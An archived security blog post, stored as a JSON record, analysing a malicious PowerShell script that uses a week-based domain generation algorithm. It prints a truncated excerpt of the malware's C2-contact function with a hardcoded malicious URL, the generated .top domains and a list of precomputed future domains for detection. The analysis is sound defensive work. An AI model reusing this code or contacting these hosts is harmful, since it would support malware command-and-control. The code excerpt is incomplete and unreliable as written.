{
	"id": "c68f3710-82d6-412e-bee8-696aa013bae7",
	"created_at": "2026-05-07T02:43:14.618284Z",
	"updated_at": "2026-05-07T02:44:10.996441Z",
	"deleted_at": null,
	"sha1_hash": "634539ef25a42b747574b0e272c6b4cd05676a31",
	"title": "Simple DGA Spotted in a Malicious PowerShell",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 67557,
	"plain_text": "Simple DGA Spotted in a Malicious PowerShell\r\nBy Xavier\r\nPublished: 2020-07-14 · Archived: 2026-05-07 02:38:21 UTC\r\nDGA (“Domain Generation Algorithm“) is a technique implemented in some malware families to defeat defenders\r\nand to make the generation of IOC’s (and their usage – example to implement black lists) more difficult. When a\r\npiece of malware has to contact a C2 server, it uses domain names or IP addresses. Once the malicious code\r\nanalyzed, it’s easy to build the list of domains/IP used and to ask the network team to block access to these\r\nnetwork resources. With a DGA, the list of domain names is generated based on some criterias and the attacker\r\nhas just to register the newly generated domain to move the C2 infrastructure somewhere else… This is a great cat\r\n\u0026 mouse game!\r\nI found a malicious PowerShell script that implements a simple DGA. Here is the code:\r\nfunction xfyucaesbv( $etdtyefbg ){\r\n $ubezabcvwd = \"http://bito.carlaarrabito.it/\";\r\n \"ge\",\"6h\",\"sp\",\"FT\",\"4H\",\"fW\",\"mP\" | %{ $ubezabcvwd += \",\"+\"http://\"+ ( [Convert]::ToBase64String(\r\n $ubezabcvwd.split(\",\") | %{\r\n if( !$myurlpost ) {\r\n $myurlpost = $_ -replace \"=\", \"\";\r\n if(!(sendpost2($etdtyefbg + \"\u0026domen=$myurlpost\"))) {\r\n $myurlpost = $false;\r\n };\r\n Start-Sleep -s 5;\r\n }\r\n };\r\n if( $etdtyefbg -match \"status=register\" ){\r\n return \"ok\";\r\n } else {\r\n return $myurlpost;\r\n }\r\n};\r\nhttps://blog.rootshell.be/2020/07/14/simple-dga-spotted-in-a-malicious-powershell/\r\nPage 1 of 3\n\nThe most interesting line is this one:\r\nPS C:\\Users\\REM\u003e \"ge\",\"6h\",\"sp\",\"FT\",\"4H\",\"fW\",\"mP\" | %{ $ubezabcvwd += \",\"+\"http://\"+ ( [Convert]::T\r\n$ubezabcvwd.split(\",\")\r\nhttp://bito.carlaarrabito.it/\r\nhttp://z2uymda3mjk=.top/\r\nhttp://nmgymda3mjk=.top/\r\nhttp://c3aymda3mjk=.top/\r\nhttp://rlqymda3mjk=.top/\r\nhttp://negymda3mjk=.top/\r\nhttp://zlcymda3mjk=.top/\r\nhttp://bvaymda3mjk=.top/Â\r\nThe first hostname is hardcoded but others are generated by a concatenation of one string (out of the array) with a\r\ntimestamp. The string is Base64 encoded and padding is removed if present. Example:\r\nbase64(\"ge\" + \"200729\") = \"z2uymda3mjk=\"\r\nThe fact that the timestamps is based on ‘%v’ (which indicates the number of the current week (0-51) is a good\r\nindicator of a DGA. One domain will be generated every week.\r\nI tried to resolve the domain names from the list above but none of them is registered right now. I generated\r\ndomains for the next two months and I’ve added them to my hunting rules:\r\nz2uymda4mzi.top\r\nnmgymda4mzi.top\r\nc3aymda4mzi.top\r\nrlqymda4mzi.top\r\nnegymda4mzi.top\r\nzlcymda4mzi.top\r\nbvaymda4mzi.top\r\nz2uymda4mzm.top\r\nnmgymda4mzm.top\r\nc3aymda4mzm.top\r\nrlqymda4mzm.top\r\nnegymda4mzm.top\r\nzlcymda4mzm.top\r\nbvaymda4mzm.top\r\nz2uymda4mzq.top\r\nnmgymda4mzq.top\r\nc3aymda4mzq.top\r\nrlqymda4mzq.top\r\nnegymda4mzq.top\r\nzlcymda4mzq.top\r\nbvaymda4mzq.top\r\nhttps://blog.rootshell.be/2020/07/14/simple-dga-spotted-in-a-malicious-powershell/\r\nPage 2 of 3\n\nz2uymda4mzu.top\r\nnmgymda4mzu.top\r\nc3aymda4mzu.top\r\nrlqymda4mzu.top\r\nnegymda4mzu.top\r\nzlcymda4mzu.top\r\nbvaymda4mzu.top\r\nz2uymda5mzy.top\r\nnmgymda5mzy.top\r\nc3aymda5mzy.top\r\nrlqymda5mzy.top\r\nnegymda5mzy.top\r\nzlcymda5mzy.top\r\nbvaymda5mzy.top\r\nz2uymda5mzc.top\r\nnmgymda5mzc.top\r\nc3aymda5mzc.top\r\nrlqymda5mzc.top\r\nnegymda5mzc.top\r\nzlcymda5mzc.top\r\nbvaymda5mzc.top\r\nz2uymda5mzg.top\r\nnmgymda5mzg.top\r\nc3aymda5mzg.top\r\nrlqymda5mzg.top\r\nnegymda5mzg.top\r\nzlcymda5mzg.top\r\nbvaymda5mzg.top\r\nz2uymda5mzk.top\r\nnmgymda5mzk.top\r\nc3aymda5mzk.top\r\nrlqymda5mzk.top\r\nnegymda5mzk.top\r\nzlcymda5mzk.top\r\nbvaymda5mzk.top\r\nI’ll keep an eye on them!\r\nSource: https://blog.rootshell.be/2020/07/14/simple-dga-spotted-in-a-malicious-powershell/\r\nhttps://blog.rootshell.be/2020/07/14/simple-dga-spotted-in-a-malicious-powershell/\r\nPage 3 of 3",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.rootshell.be/2020/07/14/simple-dga-spotted-in-a-malicious-powershell/"
	],
	"report_names": [
		"simple-dga-spotted-in-a-malicious-powershell"
	],
	"threat_actors": [],
	"ts_created_at": 1778121794,
	"ts_updated_at": 1778121850,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/634539ef25a42b747574b0e272c6b4cd05676a31.pdf",
		"text": "https://archive.orkl.eu/634539ef25a42b747574b0e272c6b4cd05676a31.txt",
		"img": "https://archive.orkl.eu/634539ef25a42b747574b0e272c6b4cd05676a31.jpg"
	}
}